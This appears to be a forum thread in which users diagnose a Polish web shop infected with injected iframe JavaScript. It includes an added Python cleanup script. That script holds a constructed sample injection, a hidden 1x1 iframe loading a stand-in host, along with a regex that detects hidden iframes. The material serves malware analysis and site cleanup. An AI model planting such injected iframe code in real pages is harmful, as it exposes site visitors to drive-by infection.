Zscaler does not flag, avast Webshield blocks as JS:Iframe-FH [Trj]

See: http://zulu.zscaler.com/submission/show/fe83f86ee97110233ea36510d56d6ee6-1333725183
Web rep 40/100: http://www.webutation.net/go/review/art-slub.com.pl
Bitdefender TrafficLight gives the page as unsafe.
Avast webshield protects us by blocking this as JS:Iframe-FH [Trj],

polonus

Using Web-Sniffer I get a 200 error; however, using my special source code viewer I could view the source. :)

Line 472 looks suspicious: just smashed-together code, directly after the closing jQuery tag.

Fixing up the code by adding spaces and tabs as necessary, I can clearly view the suspect code. See attached.

And yes, this detection is correct ;)

Hi !Donovan,

Thank you for the heads-up on that, valid avast malcode block. Thanks for analyzing that for us,

polonus

Hey, I have had this trojan on my website since Friday, 22 April 2012. I'm looking for help to solve this problem, please help. My e-mail: bartek@lingerie4u.pl, my webpage: wxw.lingerie4u.pl

Please deactivate your link…!!!
→ Use wxw instead of www (See above…!)
http://zulu.zscaler.com/submission/show/7917bf94ed0fee5bc56a206bc920db6b-1335100563

Sucuri report: http://sitecheck.sucuri.net/results/http://www.lingerie4u.pl/
Malware entry: MW:IFRAME:HD564 http://sucuri.net/malware/malware-entry-mwiframehd564

virustotal
https://www.virustotal.com/file/3de58a51e6968c34c03d12dc4e2e54cd881ed9b1056c49ca121735553077ff29/analysis/1335102050/

wepawet - suspicious
http://wepawet.iseclab.org/view.php?hash=a9e9fb8e6b8b1fb267e5fceb299ebf1b&t=1335102390&type=js

Hi chochor,

A very infected site you have indeed. You are lucky that none of the majors have decided to blacklist your site.

First, your jQuery file. (jquery-1.3.2.min.js)
Sucuri says that line 19, from "If(J===G)" down, contains the exploit. However, I did not see anything apparent in that script and decided to upload the part that looked like regular jQuery code to VirusTotal. See: https://www.virustotal.com/file/3b992588ed7d8d7eac046b7f7f9ec353c9346004ab7645981deb0dddff5bf221/analysis/1335100855/

Thus, the code before and after the /qpi/ tag contains the exploit. See attachment #1 for the readable malscript.

I am unable to access jquery.jqzoom-1.0.1.js.

jquery.jqzoom1.0.1.js contains the same exploit. Line 1124. See attachment #2 for script to be removed.

Same with jquery.hoverIntent.minified.js and jquery.fancybox-1.3.1.js. Remove the code before and after the /qpi/ tag.

I suggest you upgrade to jQuery 1.7.2.
http://docs.jquery.com/Downloading_jQuery

Your CSS files are NOT malicious. Zulu is warning of infection because they have links to your site, which is malicious.

Now for your HTML pages.

The homepage of your site is indeed infected. Check line 1518. Notice the and . Remove everything in between.

Same with your 404 pages, which I assume are generated by your 404javascript.js. Remove the code before and after the tags.

bestsellery-c-96.html, nowosci-c-31.html, and promocje-c-113.html also contain the same exploit mentioned above.

The following PHP pages do as well:
advanced_search.php
contact_us.php
create_account.php
shopping_cart.php

Reference: http://zulu.zscaler.com/submission/show/7917bf94ed0fee5bc56a206bc920db6b-1335100086
http://sitecheck.sucuri.net/results/http://www.lingerie4u.pl/

I'm assuming that the malcreants made a tool for JavaScript injection. It looks exactly alike. :-\
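The two analyses above (re-indenting the smashed-together script to read it, and locating the injected code that sits before and after the legitimate library) can be scripted. The block below is an added example, not code posted in this thread or part of any tool named in it. It assumes you have the vendor's pristine copy of each library to compare against, and all inputs (the stand-in "library", the infected copy, the HTML snippet) are constructed here; the `/*qpi*/` comment is only a stand-in for the "/qpi/" marker the thread mentions, whose exact form is not known from the page.

```python
"""Find script injected around a known-good JavaScript library, make it
readable, and flag hidden iframes in HTML.  Added example with constructed
sample data; it is not code from the forum thread or from any tool it names."""
import hashlib
import re

# Constructed stand-in for the vendor's pristine library file (in practice,
# the jquery-1.3.2.min.js you downloaded from jquery.com, not from the site).
CLEAN_LIB = "(function(){var jQuery=window.jQuery={};jQuery.fn={};})();"

# Constructed infected copy: injected code wrapped around the library.
# '/*qpi*/' is an assumed stand-in for the marker the thread calls "/qpi/".
INFECTED_LIB = (
    "/*qpi*/var d=document,i=d.createElement('iframe');i.width=1;i.height=1;"
    "i.style.visibility='hidden';i.src='http://bad.example/x.php';/*qpi*/"
    + CLEAN_LIB
    + "/*qpi*/d.body.appendChild(i);/*qpi*/"
)


def sha256(text: str) -> str:
    """Hex SHA-256 of the file contents, for a quick pristine/modified triage."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def is_pristine(local_js: str, clean_js: str) -> bool:
    """True when the local file is byte-for-byte the vendor's copy."""
    return sha256(local_js) == sha256(clean_js)


def split_injected(local_js: str, clean_js: str):
    """Return (before, after): the text surrounding the pristine library inside
    local_js.  Returns None when the library is not present verbatim, which
    means the injection is inside the library text and needs a diff instead."""
    idx = local_js.find(clean_js)
    if idx < 0:
        return None
    return local_js[:idx], local_js[idx + len(clean_js):]


def reindent(minified: str) -> str:
    """Crude pretty-printer: break after ; { } so one-line code can be read.
    Good enough for triage; it is not a JavaScript parser."""
    broken = re.sub(r"([;{}])", r"\1\n", minified)
    return "\n".join(ln.strip() for ln in broken.splitlines() if ln.strip())


# An <iframe ...> whose attributes or inline style make it invisible:
# width/height of 0 or 1, display:none, or visibility:hidden.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*?(?:width\s*=\s*['\"]?[01]\b|height\s*=\s*['\"]?[01]\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>",
    re.IGNORECASE,
)


def find_hidden_iframes(html: str):
    """Return every iframe opening tag in html that is sized or styled to be invisible."""
    return HIDDEN_IFRAME.findall(html)


# Constructed HTML: one visible embed and one 1x1 hidden iframe.
SAMPLE_HTML = (
    '<p>shop</p><iframe src="/banner.html" width="600" height="120"></iframe>'
    '<iframe src="http://bad.example/" width="1" height="1" '
    'style="visibility:hidden"></iframe>'
)

if __name__ == "__main__":
    print("library pristine:", is_pristine(INFECTED_LIB, CLEAN_LIB))
    before, after = split_injected(INFECTED_LIB, CLEAN_LIB)
    print("--- injected before library ---")
    print(reindent(before))
    print("--- injected after library ---")
    print(reindent(after))
    print("--- hidden iframes in HTML ---")
    for tag in find_hidden_iframes(SAMPLE_HTML):
        print(tag)
```

Run it over every .js file on the site with the matching vendor copy; a non-pristine hash tells you which files to look at, `split_injected` shows exactly what to cut, and the iframe check covers the HTML pages the thread lists. If `split_injected` returns None the attacker edited inside the library, and a line-by-line diff against the vendor file is the next step.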

Your CSS files are NOT malicious. Zulu is warning of infection because they have links to your site, which is malicious.
Yep, just checked those at VT and they come up clean.

OK, thanks.

!Donovan, are you able to fix this problem on my site? Write to me privately: bartek@lingerie4u.pl